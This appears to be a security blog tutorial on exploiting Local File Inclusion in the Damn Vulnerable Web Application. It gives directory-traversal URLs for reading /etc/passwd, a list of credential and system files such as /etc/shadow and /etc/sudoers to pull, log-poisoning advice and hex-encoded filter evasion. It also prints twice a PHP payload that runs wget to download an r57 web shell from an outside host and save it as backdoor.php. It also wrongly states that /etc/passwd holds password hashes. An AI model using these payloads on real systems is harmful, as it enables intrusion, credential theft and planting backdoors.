Local File Inclusion or LFI is a kind of exploit or vulnerability that allows an attacker to inject directory traversal characters on a certain website. This happens when a page include is not sanitized, here is a sample code from Damn Web Vulnerable Application:
<?php
$file = $_GET['page']; //The page we wish to display
?>
Here is the sample link of the vulnerable path : http://127.0.0.1/vulnerabilities/fi/?page=include.phpNow, let us try to do a directory traversal to the passwd file of the web server:
http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd
In most cases, you just need to add some few ../ before the /etc/passwd:
http://127.0.0.1/vulnerabilities/fi/?page=../etc/passwd
http://127.0.0.1/vulnerabilities/fi/?page=../../etc/passwd
http://127.0.0.1/vulnerabilities/fi/?page=../../../etc/passwd
So on and so forth until you see the image above. This is very dangerous especially if it's a Linux server because the passwd file shows the the hashes of the passwords on the server which could be possibly cracked in order to gain access on the server.
You can also visit other directories which can be used for information gathering and maybe we can see some luck in probing the web server:
/etc/environment
/etc/shadow
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log
There are many ways to exploit a web server, an attacker could inject a PHP code or a backdoor into the HTTPD logs, and access them via LFI again:
/var/log/apache/error_log
/apache/logs/access.log
var/log/error.log
/* and many more */
Other people may also use a Firefox add-on User-Agent switcher and spawn a shell:
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>
Other people may also use a Firefox add-on User-Agent switcher and spawn a shell:
<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>
Some admins may do some filter evasion to prevent common attacks of LFI, so what we are going to do is to encode one or more characters into hexadecimal because the browser decodes the input but the PHP does not. Example input:
http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd
About the Contributor:
Shipcode
is a prolific blogger of ROOTCON and at the same time an InfoSec
enthusiast from Cebu. He was inspired to join ROOTCON as part of the
core team to share his knowledge in information security. He encourages
other like minded individuals to come forward and share their knowledge
through blogging right here at ROOTCON Blog section.
ROOTCON is managed by like minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.